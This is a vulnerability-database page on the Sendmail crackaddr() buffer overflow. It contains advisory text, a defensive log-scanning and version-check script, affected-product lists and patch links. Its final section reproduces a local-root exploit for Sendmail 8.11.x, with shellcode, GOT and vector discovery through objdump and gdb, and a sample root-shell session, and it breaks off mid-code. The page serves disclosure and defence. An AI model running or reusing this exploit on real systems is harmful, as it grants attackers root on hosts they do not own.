CVE-2002-1337
CVSS 10.0
Published: 2003-03-07 00:00:00
Last modified: 2016-10-17 22:26:02

[Original] Buffer overflow in Sendmail 5.79 to 8.12.7 allows remote attackers to execute arbitrary code via certain formatted address fields, related to sender and recipient header comments as processed by the crackaddr function of headers.c.


[CNNVD] Sendmail Header Processing Remote Overflow Vulnerability (CNNVD-200303-038)

Most organizations run several mail transfer agents (MTAs) at various points inside their networks, and at least one of them is connected directly to the Internet. Sendmail is the most popular of these MTAs; by some estimates it handles 50% to 75% of all Internet mail traffic. Many UNIX and Linux workstations run Sendmail by default.

Sendmail versions before 8.12.8 contain a remote overflow vulnerability in the processing and evaluation of mail headers collected during an SMTP session. When a header contains an address or a list of addresses (for example "From", "To", "CC"), Sendmail attempts to check whether the supplied address or address list is valid. It does this with the crackaddr() function, which lives in the file headers.c of the Sendmail source tree.

Sendmail stores the data it is processing in a static buffer. It monitors this buffer and stops adding data once it is full. Sendmail also performs several safety checks to make sure the characters are interpreted correctly. One of these checks is flawed, however, which lets a remote attacker cause a buffer overflow by submitting a specially crafted address field. By exploiting this vulnerability an attacker gains the privileges of the user Sendmail runs as, which on most Unix and Linux systems is root.

Because the overflow occurs in a static buffer, non-executable stack protection does not help against this vulnerability. Because the attack code can be carried in a mail message that looks normal, it can easily pass undetected through many common packet-filtering devices and firewalls. A successful exploit against an unpatched sendmail leaves no message in the system log. On a patched system, however, an exploitation attempt leaves the following log message:

Dropped invalid comments from header address

This vulnerability affects both the commercial and the open-source versions of Sendmail, and it has reportedly been exploited successfully in a laboratory environment.
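Added here as a defender's triage example (it is not part of the CNNVD record or of Sendmail's own code): it applies the description's "below 8.12.8" rule to version strings and SMTP greeting banners, and it correlates the patched-system log line quoted above with the envelope line that shares the same queue id. The log lines, hostnames and addresses are constructed samples, and the envelope layout (`from=<...>, ..., relay=...`) is assumed to follow the classic sendmail syslog format.

```python
"""Triage helpers for the Sendmail crackaddr() header overflow (CVE-2002-1337)."""
import re
from typing import Dict, List, Optional, Tuple

# The advisory text says every open-source Sendmail below 8.12.8 is affected.
# The commercial Sendmail Switch line uses its own numbering and is NOT covered
# by this version rule; check it against the CPE list instead.
FIXED_VERSION = (8, 12, 8)

# A patched sendmail logs this when it rejects a crafted address. An unpatched
# one logs nothing, so the absence of this line is not evidence of safety.
PATCHED_SIGNATURE = "Dropped invalid comments from header address"

_VERSION_RE = re.compile(r"(\d+)\.(\d+)(?:\.(\d+))?")
_BANNER_RE = re.compile(r"Sendmail (\d+\.\d+(?:\.\d+)?)")
# Classic syslog line as written by sendmail: "<ts> <host> sendmail[<pid>]: <qid>: <msg>"
_LOG_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) (?P<host>\S+) sendmail\[\d+\]: "
    r"(?P<qid>\w+): (?P<msg>.*)$"
)
# Envelope line: sender and the relay (hostname and/or [address]) that delivered it.
_FROM_RE = re.compile(r"from=<(?P<sender>[^>]*)>.*relay=(?P<relay>\S+(?: \[[^\]]+\])?)")


def parse_version(text: str) -> Optional[Tuple[int, int, int]]:
    """Turn '8.12.7', '8.12.Beta10' or '8.12' into a comparable tuple.

    A missing or non-numeric patch level (beta builds) is treated as 0, which
    correctly sorts the 8.12 betas below the 8.12.8 fix.
    """
    m = _VERSION_RE.search(text)
    if not m:
        return None
    major, minor, patch = m.groups()
    return int(major), int(minor), int(patch or 0)


def is_affected(version: str) -> bool:
    """True when the version string is below the fixed 8.12.8 release."""
    v = parse_version(version)
    return v is not None and v < FIXED_VERSION


def version_from_banner(banner: str) -> Optional[str]:
    """Extract the Sendmail version from an SMTP 220 greeting line, if present."""
    m = _BANNER_RE.search(banner)
    return m.group(1) if m else None


def scan_maillog(lines: List[str]) -> List[Dict[str, str]]:
    """Find attempts rejected by the patched parser and tie each to its envelope.

    Sendmail writes the envelope ('from=... relay=...') and the rejection on
    separate lines that share a queue id, so the two are joined on that id.
    """
    envelopes: Dict[str, Dict[str, str]] = {}
    hits: List[Dict[str, str]] = []
    for line in lines:
        m = _LOG_RE.match(line.rstrip("\n"))
        if not m:
            continue
        qid, msg = m.group("qid"), m.group("msg")
        f = _FROM_RE.search(msg)
        if f:
            envelopes[qid] = {"sender": f.group("sender"), "relay": f.group("relay")}
        elif msg.startswith(PATCHED_SIGNATURE):
            env = envelopes.get(qid, {})
            hits.append({
                "time": m.group("ts"),
                "host": m.group("host"),
                "queue_id": qid,
                "sender": env.get("sender", "?"),
                "relay": env.get("relay", "?"),
            })
    return hits


# Constructed sample maillog: one rejected attempt, one ordinary delivery.
SAMPLE_MAILLOG = """\
Mar  4 10:15:21 mx1 sendmail[1234]: h24AFLab001234: from=<bob@example.net>, size=1843, class=0, nrcpts=1, msgid=<1@example.net>, proto=ESMTP, daemon=MTA, relay=[192.0.2.10]
Mar  4 10:15:22 mx1 sendmail[1234]: h24AFLab001234: Dropped invalid comments from header address
Mar  4 10:16:02 mx1 sendmail[1240]: h24AFMcd001240: from=<alice@example.org>, size=900, class=0, nrcpts=1, msgid=<2@example.org>, proto=ESMTP, daemon=MTA, relay=mail.example.org [198.51.100.7]
Mar  4 10:16:03 mx1 sendmail[1240]: h24AFMcd001240: to=<carol@example.com>, delay=00:00:01, mailer=local, stat=Sent
""".splitlines()

if __name__ == "__main__":
    banner = "220 mx1.example.com ESMTP Sendmail 8.12.7/8.12.7; Tue, 4 Mar 2003 10:15:20 +0100"
    v = version_from_banner(banner)
    print(f"banner version {v}: {'AFFECTED, upgrade to 8.12.8' if v and is_affected(v) else 'not affected'}")
    for hit in scan_maillog(SAMPLE_MAILLOG):
        print(f"{hit['time']} {hit['host']} qid={hit['queue_id']} "
              f"relay={hit['relay']} sender={hit['sender']}: crafted address dropped")
```

Run it against a real `/var/log/maillog` by passing the file's lines to `scan_maillog`; a hit means the host is patched and was probed, while a silent unpatched host needs the version check, not the log check.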
        

- CVSS (Base Score)

CVSS score: 10 [Severe (HIGH)]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (Affected Platforms and Products)

cpe:/a:sendmail:sendmail_switch:3.0.2
cpe:/o:sun:solaris:9.0::x86
cpe:/a:sendmail:sendmail:8.10.2  Sendmail Sendmail 8.10.2
cpe:/a:sendmail:sendmail:8.12.0  Sendmail Sendmail 8.12.0
cpe:/o:sun:solaris:7.0::x86
cpe:/a:sendmail:sendmail:8.10.1  Sendmail Sendmail 8.10.1
cpe:/a:sendmail:sendmail:8.12.2  Sendmail Sendmail 8.12.2
cpe:/a:sendmail:sendmail:8.12.1  Sendmail Sendmail 8.12.1
cpe:/a:sendmail:sendmail:8.12.4  Sendmail Sendmail 8.12.4
cpe:/a:sendmail:sendmail:8.12.3  Sendmail Sendmail 8.12.3
cpe:/a:sendmail:sendmail:8.12.6  Sendmail Sendmail 8.12.6
cpe:/a:sendmail:sendmail:8.12.5  Sendmail Sendmail 8.12.5
cpe:/a:sendmail:sendmail_switch:2.2.1
cpe:/a:sendmail:sendmail_switch:2.2.4
cpe:/o:sun:solaris:2.6
cpe:/o:sun:solaris:8.0
cpe:/a:sendmail:sendmail_switch:3.0
cpe:/o:hp:hp-ux:11.11  HP-UX 11.11
cpe:/a:sendmail:sendmail:3.0.2::nt
cpe:/a:sendmail:sendmail:3.0.1::nt
cpe:/o:windriver:bsdos:4.3.1  Wind River Systems BSD 4.3.1
cpe:/a:sgi:freeware:1.0
cpe:/a:sendmail:sendmail_switch:2.1.3
cpe:/a:sendmail:sendmail_switch:2.1.4
cpe:/a:sendmail:sendmail_switch:2.1.1
cpe:/a:sendmail:sendmail:8.12.7  Sendmail Sendmail 8.12.7
cpe:/a:sendmail:sendmail:8.9.3  Sendmail Sendmail 8.9.3
cpe:/a:sendmail:sendmail:5.65
cpe:/o:gentoo:linux:1.4:rc2  Gentoo Linux 1.4 rc2
cpe:/a:sendmail:sendmail:8.10  Sendmail Sendmail 8.10
cpe:/a:sendmail:sendmail:8.9.0  Sendmail Sendmail 8.9.0
cpe:/a:sendmail:sendmail:8.12:beta10  Sendmail Sendmail 8.12 Beta10
cpe:/a:sendmail:sendmail:8.9.2  Sendmail Sendmail 8.9.2
cpe:/a:sendmail:sendmail:5.61
cpe:/a:sendmail:sendmail:8.9.1  Sendmail Sendmail 8.9.1
cpe:/o:windriver:bsdos:5.0  Wind River Systems BSD 5.0
cpe:/o:sun:solaris:9.0::sparc
cpe:/o:hp:hp-ux:10.10  HP HP-UX 10.10
cpe:/o:hp:hp-ux:11.22  HP-UX 11i v1.6
cpe:/a:sendmail:sendmail:3.0::nt
cpe:/o:gentoo:linux:1.4:rc1  Gentoo Linux 1.4 rc1
cpe:/a:sendmail:sendmail:2.6::nt
cpe:/o:sun:solaris:2.6::x86
cpe:/o:sun:solaris:8.0::x86
cpe:/a:sendmail:sendmail:8.11.1  Sendmail Sendmail 8.11.1
cpe:/a:sendmail:sendmail:8.11.0  Sendmail Sendmail 8.11
cpe:/a:sendmail:sendmail:8.11.3  Sendmail Sendmail 8.11.3
cpe:/a:sendmail:advanced_message_server:1.3  Sendmail Sendmail Advanced Message Server 1.3
cpe:/a:sendmail:sendmail:8.11.2  Sendmail Sendmail 8.11.2
cpe:/a:sendmail:sendmail:8.11.5  Sendmail Sendmail 8.11.5
cpe:/a:sendmail:sendmail:8.12:beta12  Sendmail Sendmail 8.12 Beta12
cpe:/a:sendmail:sendmail:8.11.4  Sendmail Sendmail 8.11.4
cpe:/a:sendmail:sendmail:8.11.6  Sendmail Sendmail 8.11.6
cpe:/a:sendmail:sendmail:8.12:beta16  Sendmail Sendmail 8.12 Beta16
cpe:/o:netbsd:netbsd:1.5.1  NetBSD 1.5.1
cpe:/o:sun:solaris:7.0
cpe:/a:sendmail:sendmail_switch:2.1.2
cpe:/o:netbsd:netbsd:1.5.3  NetBSD 1.5.3
cpe:/o:netbsd:netbsd:1.5.2  NetBSD 1.5.2
cpe:/o:netbsd:netbsd:1.6  NetBSD 1.6
cpe:/a:sendmail:sendmail_switch:2.1
cpe:/o:netbsd:netbsd:1.5  NetBSD 1.5
cpe:/a:sendmail:advanced_message_server:1.2  Sendmail Sendmail Advanced Message Server 1.2
cpe:/a:sendmail:sendmail_switch:2.2
cpe:/o:hp:hp-ux:10.20  HP HP-UX 10.20
cpe:/a:sendmail:sendmail:5.59
cpe:/a:sendmail:sendmail:8.12:beta5  Sendmail Sendmail 8.12 Beta5
cpe:/a:sendmail:sendmail:8.12:beta7  Sendmail Sendmail 8.12 beta7
cpe:/a:sendmail:sendmail_switch:2.2.2
cpe:/a:sendmail:sendmail:2.6.1::nt
cpe:/a:sendmail:sendmail_switch:2.2.3
cpe:/o:windriver:bsdos:4.2  Wind River Systems BSD 4.2
cpe:/h:hp:alphaserver_sc  HP AlphaServer SC
cpe:/o:windriver:platform_sa:1.0  Wind River Systems Platform SA 1.0
cpe:/o:hp:hp-ux:11.00  HP-UX 11.00
cpe:/a:sendmail:sendmail:8.8.8  Sendmail Sendmail 8.8.8
cpe:/a:sendmail:sendmail_switch:3.0.1
cpe:/o:hp:hp-ux:11.0.4  HP HP-UX 11.0.4

- OVAL (Technical Details for Detection)

oval:org.mitre.oval:def:2222  Sendmail Address Processor Buffer Overflow
*OVAL describes in detail how to detect this vulnerability; more technical details on detecting it can be found in the related OVAL definition.

- Official Database Links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1337
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-1337
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200303-038
(Official data source) CNNVD

- Other Links and Resources

ftp://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2003-002.txt.asc
(UNKNOWN)  NETBSD  NetBSD-SA2003-002
ftp://ftp.sco.com/pub/updates/OpenServer/CSSA-2003-SCO.6
(UNKNOWN)  CALDERA  CSSA-2003-SCO.6
ftp://ftp.sco.com/pub/updates/UnixWare/CSSA-2003-SCO.5
(UNKNOWN)  CALDERA  CSSA-2003-SCO.5
ftp://patches.sgi.com/support/free/security/advisories/20030301-01-P
(UNKNOWN)  SGI  20030301-01-P
http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000571
(UNKNOWN)  CONECTIVA  CLA-2003:571
http://frontal2.mandriva.com/security/advisories?name=MDKSA-2003:028
(UNKNOWN)  MANDRAKE  MDKSA-2003:028
http://marc.info/?l=bugtraq&m=104673778105192&w=2
(UNKNOWN)  BUGTRAQ  20030303 sendmail 8.12.8 available
http://marc.info/?l=bugtraq&m=104678739608479&w=2
(UNKNOWN)  BUGTRAQ  20030304 [LSD] Technical analysis of the remote sendmail vulnerability
http://marc.info/?l=bugtraq&m=104678862109841&w=2
(UNKNOWN)  BUGTRAQ  20030303 Fwd: APPLE-SA-2003-03-03 sendmail
http://marc.info/?l=bugtraq&m=104678862409849&w=2
(UNKNOWN)  BUGTRAQ  20030304 GLSA: sendmail (200303-4)
http://marc.info/?l=bugtraq&m=104679411316818&w=2
(UNKNOWN)  HP  HPSBUX0302-246
http://www-1.ibm.com/support/search.wss?rs=0&q=IY40500&apar=only
(UNKNOWN)  AIXAPAR  IY40500
http://www-1.ibm.com/support/search.wss?rs=0&q=IY40501&apar=only
(UNKNOWN)  AIXAPAR  IY40501
http://www-1.ibm.com/support/search.wss?rs=0&q=IY40502&apar=only
(UNKNOWN)  AIXAPAR  IY40502
http://www.cert.org/advisories/CA-2003-07.html
(VENDOR_ADVISORY)  CERT  CA-2003-07
http://www.debian.org/security/2003/dsa-257
(UNKNOWN)  DEBIAN  DSA-257
http://www.iss.net/issEn/delivery/xforce/alertdetail.jsp?oid=21950
(VENDOR_ADVISORY)  ISS  20030303 Remote Sendmail Header Processing Vulnerability
http://www.iss.net/security_center/static/10748.php
(UNKNOWN)  XF  sendmail-header-processing-bo(10748)
http://www.kb.cert.org/vuls/id/398025
(UNKNOWN)  CERT-VN  VU#398025
http://www.redhat.com/support/errata/RHSA-2003-073.html
(UNKNOWN)  REDHAT  RHSA-2003:073
http://www.redhat.com/support/errata/RHSA-2003-074.html
(UNKNOWN)  REDHAT  RHSA-2003:074
http://www.redhat.com/support/errata/RHSA-2003-227.html
(UNKNOWN)  REDHAT  RHSA-2003:227
http://www.securityfocus.com/bid/6991
(VENDOR_ADVISORY)  BID  6991
http://www.sendmail.org/8.12.8.html
(VENDOR_ADVISORY)  CONFIRM  http://www.sendmail.org/8.12.8.html

- Vulnerability Information

Sendmail Header Processing Remote Overflow Vulnerability
Critical    Boundary condition error
2003-03-07 00:00:00 2006-08-24 00:00:00
Remote / Local

- Advisories and Patches

Workaround:
There is no good workaround for this vulnerability. You should upgrade your system as soon as possible. If you cannot install the patch or upgrade immediately, CNNVD recommends the following measure to reduce the threat:
* Stop using Sendmail.
Vendor patches:
Conectiva
---------
Conectiva has released a security advisory (CLA-2003:571) and the corresponding patches:
CLA-2003:571: sendmail
Link:
http://distro.conectiva.com/atualizacoes/?id=a&anuncio=000571

Patch downloads:
        ftp://atualizacoes.conectiva.com.br/6.0/SRPMS/sendmail-8.11.6-1U60_3cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/6.0/RPMS/sendmail-8.11.6-1U60_3cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/6.0/RPMS/sendmail-cf-8.11.6-1U60_3cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/6.0/RPMS/sendmail-doc-8.11.6-1U60_3cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/7.0/SRPMS/sendmail-8.11.6-1U70_3cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/7.0/RPMS/sendmail-8.11.6-1U70_3cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/7.0/RPMS/sendmail-cf-8.11.6-1U70_3cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/7.0/RPMS/sendmail-doc-8.11.6-1U70_3cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/8/SRPMS/sendmail-8.11.6-2U80_3cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/8/RPMS/sendmail-8.11.6-2U80_3cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/8/RPMS/sendmail-cf-8.11.6-2U80_3cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/8/RPMS/sendmail-doc-8.11.6-2U80_3cl.i386.rpm
FreeBSD
-------
FreeBSD has released security advisory FreeBSD-SA-03:04 to fix this vulnerability:
ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-03:04.sendmail.asc
HP
--
HP has assigned tracking number SSRT3479 to this issue:
        HP HP-UX 10.10:
        HP Upgrade sendmail.886.10.01.gz
ftp://sendmail:sendmail@hprc.external.hp.com/
        HP-UX 10.10
        HP Patch HPSecurityBul246.depot.gz
        
        http://itrc.hp.com

        HP Patch sendmail.886.10.10.gz
ftp://sendmail:sendmail@hprc.external.hp.com/
        HP HP-UX 10.20:
        HP Patch PHNE_25183
        
        http://itrc.hp.com

        HP Upgrade sendmail.893.10.20.gz
ftp://sendmail:sendmail@hprc.external.hp.com/
        HP-UX 10.20
        HP Patch HPSecurityBul246.depot.gz
        
        http://itrc.hp.com

        HP Patch PHNE_28760
        
        http://itrc.hp.com

        HP HP-UX 11.0 4:
        HP Upgrade sendmail.811.11.00.gz
ftp://sendmail:sendmail@hprc.external.hp.com/
        HP-UX 11.04
        HP Upgrade sendmail.893.11.00.gz
ftp://sendmail:sendmail@hprc.external.hp.com/
        HP-UX 11.04
        HP Patch HPSecurityBul246.depot.gz
        
        http://itrc.hp.com

        HP Patch PHNE_29526
        ftp://ftp.itrc.hp.com/hp-ux_patches/s700_800/11.X/PHNE_29526
        HP Patch PHNE_25984
        
        http://itrc.hp.com

        HP HP-UX 11.0:
        HP Upgrade sendmail.811.11.00.gz
ftp://sendmail:sendmail@hprc.external.hp.com/
        HP-UX 11.00
        HP Upgrade sendmail.893.11.00.gz
ftp://sendmail:sendmail@hprc.external.hp.com/
        HP-UX 11.00
        HP Upgrade PHNE_24419
        Upgrade from Sendmail 8.8.6 to 8.9.3 for HP-UX 11.00.
        HP Patch HPSecurityBul246.depot.gz
        
        http://itrc.hp.com

        HP Patch PHNE_28809
        
        http://itrc.hp.com

        HP HP-UX 11.11:
        HP Upgrade sendmail.811.11.11.gz
ftp://sendmail:sendmail@hprc.external.hp.com/
        HP-UX 11.11
        HP Upgrade sendmail.893.11.11.gz
ftp://sendmail:sendmail@hprc.external.hp.com/
        HP-UX 11.11
        HP Patch HPSecurityBul246.depot.gz
        
        http://itrc.hp.com

        HP Patch sendmail.811.11.11.r1.gz
ftp://sendmail:sendmail@hprc.external.hp.com/
        HP Patch PHNE_28810
        
        http://itrc.hp.com

        HP HP-UX 11.22:
        HP Upgrade sendmail.811.11.22.gz
ftp://sendmail:sendmail@hprc.external.hp.com/
        HP-UX 11.22
        HP Patch HPSecurityBul246.depot.gz
        
        http://itrc.hp.com

        HP Patch PHNE_28409
        
        http://itrc.hp.com

        HP Patch t64v40gb17-c0028100-16887-es-20030211.tar
        ftp://ftp1.support.compaq.com/public/unix/v4.0g/t64v40gb17-c0028100-16887-es-20030211.tar
        Tru64 UNIX 4.0G PK3 (BL17) is required prior to installing this Early Release Patch Kit.
        HP Patch duv40fb18-c0092200-16888-es-20030211.tar
        ftp://ftp1.support.compaq.com/public/unix/v4.0f/duv40fb18-c0092200-16888-es-20030211.tar
        Tru64 UNIX 4.0 PK7 (BL18) is required prior to installing this Early Release Pat

- Vulnerability Information (411)

Sendmail 8.11.x Exploit (i386-Linux) (EDBID:411)
linux local
2001-01-01 Verified
0 sd
N/A
/*
	sendmail 8.11.x exploit (i386-Linux) by sd@sf.cz (sd@ircnet)
	~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

	This code exploits well-known local-root bug in sendmail 8.11.x,
	8.12.x may be vulnerable too, but I didn't test it.

	It gives instant root shell with +s sendmail 8.11.x, x < 6

	We're using objdump, gdb & grep in order to obtain VECT, so make sure
	that they're on $PATH, works with 80% accuracy on stripped binaries
	on several distros without changing offsets (rh7.0, rh7.1, suse7.2,
	slackware 8.0...)

	Greetz:

	mlg & smoke : diz is mostly for .ro ppl ;) killall sl3
	sorcerer    : stop da fuckin' asking me how to sploit sm, diz crap
	              is for lamers like you ;))))
	devik       : sm 0wns ;)
	to #linux.cz, #hack ....

	.... and to alot of other ppl, where i can't remeber theyr handles ;)

	args:
	-d     specify depth of analysis (default=32) [bigger = more time]
	-o     change offset (default = -32000) [between 1000..-64000]
	-v     specify victim (default /usr/sbin/sendmail) [+s sm binary]
	-t     specify temp directory (default /tmp/.sxp)
	       [temporary files, should be mounted as nosuid]

	An example (redhat 7.0 CZ):
-------------------------------------------------------------------------------
[sd@pikatchu sxp]$ gcc sx.c -o sx
[sd@localhost sxp]$ ./sx

...-=[ Sendmail 8.11.x exploit, (c)oded by sd@sf.cz [sd@ircnet], 2001 ]=-...
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

[*] Victim = /usr/sbin/sendmail
[*] Depth  = 32
[*] Offset = -16384
[*] Temp   = /tmp/.sxp
[*] ESP    = 0xbfffe708
[+] Created /tmp/.sxp
[+] Step 1. setuid() got = 0x080aa028
[*] Step 2. Copying /usr/sbin/sendmail to /tmp/.sxp/sm...OK
[*] Step 3. Disassembling /tmp/.sxp/sm...OK, found 3 targets
[*] Step 4. Exploiting 3 targets:
[1] (33% of targets) GOT=0x080aa028, VECT=0x00000064, offset=-16384
[2] (66% of targets) GOT=0x080aa028, VECT=0x080c6260, offset=-16384

Voila babe, entering rootshell!
Enjoy!
uid=0(root) gid=0(root) groups=0(root)
[root@pikatchu /]# whoami
root
[root@pikatchu /]# exit
exit
Thanx for choosing sd's products ;)
[sd@pikatchu sxp]$
--------------------------------------------------------------------------------

	Enjoy! And don't abuse it too much :)
*/

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <unistd.h>
#include <fcntl.h>
#include <signal.h>
#include <sys/wait.h>
#include <string.h>

#define	SM	"/usr/sbin/sendmail"
#define	OBJDUMP	"objdump"
#define	GDB	"gdb"
#define GREP	"grep"

#define	OURDIR	"/tmp/.sxp"

/* an basic regexp to get interesting stuff from disassembled output
   change it as you like if something doesn't work */

#define	DLINE	"%s -d %s 2> /dev/null | %s -B %d \"mov.*%%.l,(%%e..,%%e..,1)\" | %s \".mov .*0x80.*,%%e..\""
#define DLINEA	OBJDUMP, vict, GREP, depth, GREP

#define	BRUTE_DLINE	"%s -d %s 2> /dev/null | %s \".mov .*0x80.*,%%e..\""
#define BRUTE_DLINEA	OBJDUMP, vict, GREP


#define NOPLEN	32768

#define uchar unsigned char
#define NOP 0x90

/* 19 bytes ;), shell must be appended */
char shellcode[] =
	"\xeb\x0c\x5b\x31\xc0\x50\x89\xe1"
        "\x89\xe2\xb0\x0b\xcd\x80\xe8\xef"
        "\xff\xff\xff";


char	scode[512];
char	dvict[] = SM;

struct	target {
	uint	off;
	uint	brk;
	uint	vect;
};

unsigned int get_esp()
{
	__asm__("movl %esp,%eax");
}

char	ourdir[256] = OURDIR;

/* cleanup */
void	giveup(int i)
{
	char buf[256];
	sprintf(buf, "/bin/rm -rf %s > /dev/null 2> /dev/null", ourdir);
	system(buf);
	if (i >= 0) exit(i);
}

/* main sploit, stolen mostly from alsou.c ;) */
void	sploit(char *victim, uint got, uint vect, uint ret)
{
	uchar	egg[sizeof(scode) + NOPLEN + 5];
	char	s[512] = "-d";
	char	*argv[3];
	char	*envp[2];
	uint	first, last, i;

	strcpy(egg, "EGG=");
	memset(egg + 4, NOP, NOPLEN);
	strcpy(egg + 4 + NOPLEN, scode);

	last = first = -vect - (0xffffffff - got + 1);
	while (ret) {
		char	tmp[256];
		i = ret & 0xff;
		sprintf(tmp, "%u-%u.%u-", first, last, i);
		strcat(s, tmp);
		last = ++first;
		ret = ret >> 8;
	}
	s[strlen(s) - 1] = 0;
	argv[0] = victim;
	argv[1] = s;
	argv[2] = NULL;
	envp[0] = egg;
	envp[1] = NULL;
	execve(victim, argv, envp);
}

int	use(char *s)
{
	 printf("%s [command] [options]\n"
		"-h     this help\n"
		"-d     specify depth of analysis (default=32)\n"
		"-o     change offset (default = -32000)\n"
		"-v     specify victim (default /usr/sbin/sendmail)\n"
		"-t     specify temp directory (default /tmp/.sxp)\n"
		"-b	enables bruteforce (WARNING: this may take about 20-30 minutes!)\n", s);
	return 1;
}

/* exploited flag */
int	exploited = 0;

/* child root-shell will send us SIGUSR if everything is ok */
void	sigusr(int i)
{
	exploited++;
	giveup(-1);
}

int	main(int argc, char *argv[])
{
	char	victim[256] = SM;
	char	vict[256];
	char	gscr[256];
	char	path[256];
	
	char	d[256];
	struct	stat	st;
	FILE	*f;
	char	buf[256];
	int	got;

	struct	target t[1024];
	uint	off, ep, l;
	int	i,j;

	int	offset = -16384;
	int	esp;
	int	depth = 32;
	int	brute = 0;

	/* rootshell (if argv[0] == NULL) */
	if (!*argv) {
		/* open stdin and stdout */
		dup2(2, 0);
		dup2(2, 1);
		setuid(0);	/* regain root privs */
		setgid(0);
		/* send signal to parent that exploit is done */
		kill(getppid(), SIGUSR1);
		/* l-a-m-e ;) */
		printf("\nVoila babe, entering rootshell!\nEnjoy!\n"); fflush(stdout);
		chdir("/");
		system("/usr/bin/id");
		setenv("BASH_HISTORY", "/dev/null", 1);
		execl("/bin/bash", "-bash", NULL);
	}

	printf("\n...-=[ Sendmail 8.11.x exploit, (c)oded by sd@sf.cz [sd@ircnet], 2001 ]=-...\n"
	       "      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n");

	while ( ( i = getopt(argc, argv, "hd:o:v:t:b") ) != EOF) {
		switch (i) {
			case 'd':
				if ((!optarg) || (sscanf(optarg, "%d", &depth) != 1))
					return use(argv[0]);
				break;
			case 'o':
				if ((!optarg) || (sscanf(optarg, "%d", &offset) != 1))
					return use(argv[0]);
				break;
			case 'v':
				if (!optarg) return use(argv[0]);
				strcpy(victim, optarg);
				break;
			case 't':
				if (!optarg) return use(argv[0]);
				strcpy(ourdir, optarg);
				break;
			case 'b':
				brute++;
				break;
			case 'h':
			default:
				return use(argv[0]);
		}
	}
	if (brute) printf("[*] Using brute force, this may take some time\n");
	/* create full path to rootshell, cause
           sendmail will change it's cwd */
	path[0] = 0;
	if (argv[0][0] != '/') {
		getcwd(path, 256);
	}

	/* construct shellcode */
	sprintf(scode, "%s%s/%s", shellcode, path, argv[0]);

	/* get stack frame */
	esp = get_esp();
	close(0);
	signal(SIGUSR1, sigusr);

	/* remove old stuff */
	giveup(-1);

	printf( "[*] Victim = %s\n"
		"[*] Depth  = %d\n"
		"[*] Offset = %d\n"
		"[*] Temp   = %s\n"
		"[*] ESP    = 0x%08x\n",
		victim,
		depth,
		offset,
		ourdir,
		esp);
	stat(victim, &st);
	if ((st.st_mode & S_ISUID) == 0) {
		printf("[-] Bad: %s isn't suid ;(\n", victim);
	}

	if (access(victim, R_OK + X_OK + F_OK) < 0) {
		printf("[-] Bad: We haven't access to %s !\n", victim);
	}

	if (mkdir(ourdir, 0777) < 0) {
		perror("[-] Can't create our tempdir!\n");
		giveup(1);
	}
	printf("[+] Created %s\n", ourdir);
	sprintf(buf, "%s -R %s | grep setuid", OBJDUMP, victim);
	f = popen(buf, "r");
	if (fscanf(f, "%x", &got) != 1) {
		pclose(f);
		printf("[-] Cannot get setuid() GOT\n");
		giveup(1);
	}
	/* get GOT */
	pclose(f);
	printf("[+] Step 1. setuid() got = 0x%08x\n", got);
	sprintf(vict, "%s/sm", ourdir);
	printf("[*] Step 2. Copying %s to %s...", victim, vict); fflush(stdout);
	sprintf(buf, "/bin/cp -f %s %s", victim, vict);
	system(buf);
	if (access(vict, R_OK + X_OK + F_OK) < 0) {
		perror("Failed");
		giveup(1);
	}
	printf("OK\n");
	/* disassemble & find targets*/
	printf("[*] Step 3. Disassembling %s...", vict); fflush(stdout);
	if (!brute) {
		sprintf(buf, DLINE, DLINEA);
	} else {
		sprintf(buf, BRUTE_DLINE, BRUTE_DLINEA);
	}
	f = popen(buf, "r");
	i = 0;
	while (fgets(buf, 256, f)) {
		int	k, dontadd = 0;
		if (sscanf(buf, "%x: %s %s %s %s %s %s 0x%x,%s\n",
                    &ep, d, d, d, d, d, d, &off, d) == 9) {
			/* same value ? */
			for (k=0; k < i; k++) {
				if (t[k].off == off) dontadd++;
			}
			/* new value ? */
			if (!dontadd) {
				/* add it to table */
				t[i].off = off;
				t[i++].brk = ep;
			}
		}
	}
	pclose(f);
	printf("OK, found %d targets\n", i);

	/* gdb every target and look for theyr VECT */
	printf("[*] Step 4. Exploiting %d targets:\n", i); fflush(stdout);
	sprintf(gscr, "%s/gdb", ourdir);

	off = 0;
	for (j=0; j < i; j++) {
		/* create gdb script */
		f = fopen(gscr, "w+");
		if (!f) {
			printf("Cannot create gdb script\n");
			giveup(1);
		}
		fprintf(f, "break *0x%x\nr -d1-1.1\nx/x 0x%x\n", t[j].brk, t[j].off);
		fclose(f);
		sprintf(buf, "%s -batch -x %s %s 2> /dev/null", GDB, gscr, vict);
		f = popen(buf, "r");
		if (!f) {
			printf("Failed to spawn gdb!\n");
			giveup(1);
		}
		/* scan gdb's output */
		while (1) {
			char buf[256];
			char *p;
			t[j].vect = 0;
			p = fgets(buf, 256, f);
			if (!p) break;
			if (sscanf(p, "0x%x %s 0x%x", &ep, d, &l) == 3) {
